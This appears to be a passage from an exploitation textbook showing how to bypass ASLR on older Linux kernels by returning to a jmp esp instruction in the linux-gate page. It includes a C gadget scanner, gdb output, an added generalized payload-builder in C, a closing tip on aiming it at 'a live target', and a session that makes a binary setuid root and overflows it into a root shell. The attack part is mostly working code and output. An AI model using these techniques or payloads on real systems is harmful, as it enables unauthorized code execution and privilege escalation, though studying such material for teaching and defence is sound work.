find_jmpesp.c
#include <stdio.h>

int main()
{
   /* linux-gate.so.1 (the kernel's vDSO page) is mapped at this fixed
      address on the kernel used here, even with ASLR enabled */
   unsigned long linuxgate_start = 0xffffe000;
   char *ptr = (char *) linuxgate_start;
   int i;
   /* scan the 4096-byte page for the two-byte opcode ff e4 (jmp esp);
      stop one byte early so ptr[i+1] never reads past the page */
   for(i=0; i < 4095; i++)
   {
      if(ptr[i] == '\xff' && ptr[i+1] == '\xe4')
         printf("found jmp esp at %p\n", ptr+i);
   }
   return 0;
}
When the program is compiled and run, it shows that this instruction
exists at 0xffffe777. This can be further verified using GDB:
matrix@loki /hacking $ ./find_jmpesp
found jmp esp at 0xffffe777
matrix@loki /hacking $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483f0: file aslr_demo.c, line 7.
(gdb) run
Starting program: /hacking/aslr_demo
Breakpoint 1, main (argc=1, argv=0xbf869894) at aslr_demo.c:7
7 printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777: jmp esp
(gdb)
Putting it all together, if we overwrite the return address with the address
0xffffe777, then execution will jump into linux-gate when the main function
returns. Since this is a jmp esp instruction, execution will immediately jump
back out of linux-gate to wherever ESP happens to be pointing. From our
previous debugging, we know that at the end of the main function, ESP is
pointing to memory directly after the return address. So if shellcode is put
here, EIP should bounce right into it. The trampoline only works because
linux-gate sits at the same address in every run of this kernel; the stack
itself is still randomized, but the payload never needs to know where it is.
On later kernels the vDSO page is randomized along with everything else, so
the address found here cannot be relied upon there.
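The gadget scan and payload layout above, generalized as an added example (this is not the book's code). It scans a memory region for the common ESP trampolines (jmp esp, call esp, push esp; ret) without reading past the end of the region, then builds the same payload the perl one-liner produces: the return address repeated, little-endian, followed by the shellcode. Because a fixed linux-gate page cannot be assumed on a modern host, the region scanned is a constructed 4096-byte stand-in with ff e4 planted at offset 0x777; the gadget table, function names and the NOP/int3 sample shellcode are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Opcode bytes for instructions that transfer control to the address in ESP.
   Table of assumed gadgets, not taken from the page. */
static const unsigned char JMP_ESP[2]  = {0xff, 0xe4};
static const unsigned char CALL_ESP[2] = {0xff, 0xd4};
static const unsigned char PUSH_ESP_RET[2] = {0x54, 0xc3};

/* Scan `region` for `pat`; return the offset of the first match or -1.
   The loop bound (i + patlen <= len) keeps every read inside the region,
   unlike a naive ptr[i+1] test that runs to the last byte. */
long find_pattern(const unsigned char *region, size_t len,
                  const unsigned char *pat, size_t patlen)
{
    if (patlen == 0 || len < patlen)
        return -1;
    for (size_t i = 0; i + patlen <= len; i++)
        if (memcmp(region + i, pat, patlen) == 0)
            return (long)i;
    return -1;
}

/* Build the payload used on the page: `reps` copies of the return address in
   little-endian byte order (what perl's "\x77\xe7\xff\xff" spells out),
   followed by the shellcode.  Returns bytes written, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t outlen, uint32_t ret, size_t reps,
                     const unsigned char *shellcode, size_t sclen)
{
    size_t need = reps * 4 + sclen;
    if (outlen < need)
        return 0;
    for (size_t r = 0; r < reps; r++) {
        out[r * 4 + 0] = (unsigned char)(ret & 0xff);
        out[r * 4 + 1] = (unsigned char)((ret >> 8) & 0xff);
        out[r * 4 + 2] = (unsigned char)((ret >> 16) & 0xff);
        out[r * 4 + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    memcpy(out + reps * 4, shellcode, sclen);
    return need;
}

/* Constructed stand-in for the linux-gate page: zero-filled, with a jmp esp
   planted at 0x777 (matching the page's result) and a lone 0xff as the very
   last byte, which a scan that reads ptr[i+1] at i == 4095 would mishandle. */
void make_sample_page(unsigned char page[4096])
{
    memset(page, 0, 4096);
    page[0x777] = 0xff;
    page[0x778] = 0xe4;
    page[4095]  = 0xff;
}

int main(void)
{
    unsigned char page[4096];
    unsigned char payload[256];
    const uint32_t gate_base = 0xffffe000;          /* assumed fixed base */
    const unsigned char sc[] = {0x90, 0x90, 0xcc};  /* constructed sample "shellcode" */

    make_sample_page(page);

    long off = find_pattern(page, sizeof page, JMP_ESP, sizeof JMP_ESP);
    if (off < 0) {
        puts("no jmp esp in region");
        return 1;
    }
    uint32_t ret = gate_base + (uint32_t)off;
    printf("found jmp esp at 0x%08x\n", ret);
    printf("call esp: %ld, push esp; ret: %ld (offsets, -1 = absent)\n",
           find_pattern(page, sizeof page, CALL_ESP, 2),
           find_pattern(page, sizeof page, PUSH_ESP_RET, 2));

    size_t n = build_payload(payload, sizeof payload, ret, 20, sc, sizeof sc);
    printf("payload: %zu bytes, first dword %02x %02x %02x %02x\n",
           n, payload[0], payload[1], payload[2], payload[3]);
    return 0;
}
```

To use it against a live target, replace make_sample_page with a read of the region you want to search (the page does this by dereferencing the linux-gate address directly) and feed the returned payload to the program's argument the way the perl/cat command line does.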
matrix@loki /hacking $ sudo chown root:root ./aslr_demo
matrix@loki /hacking $ sudo chmod u+s ./aslr_demo
matrix@loki /hacking $ ./aslr_demo $(perl -e 'print "\x77\xe7\xff\xff"x20')$(cat scode.bin)
buffer is at 0xbf8d9ae0
sh-3.1#
This technique can also be used to exploit the notesearch program, as
shown here.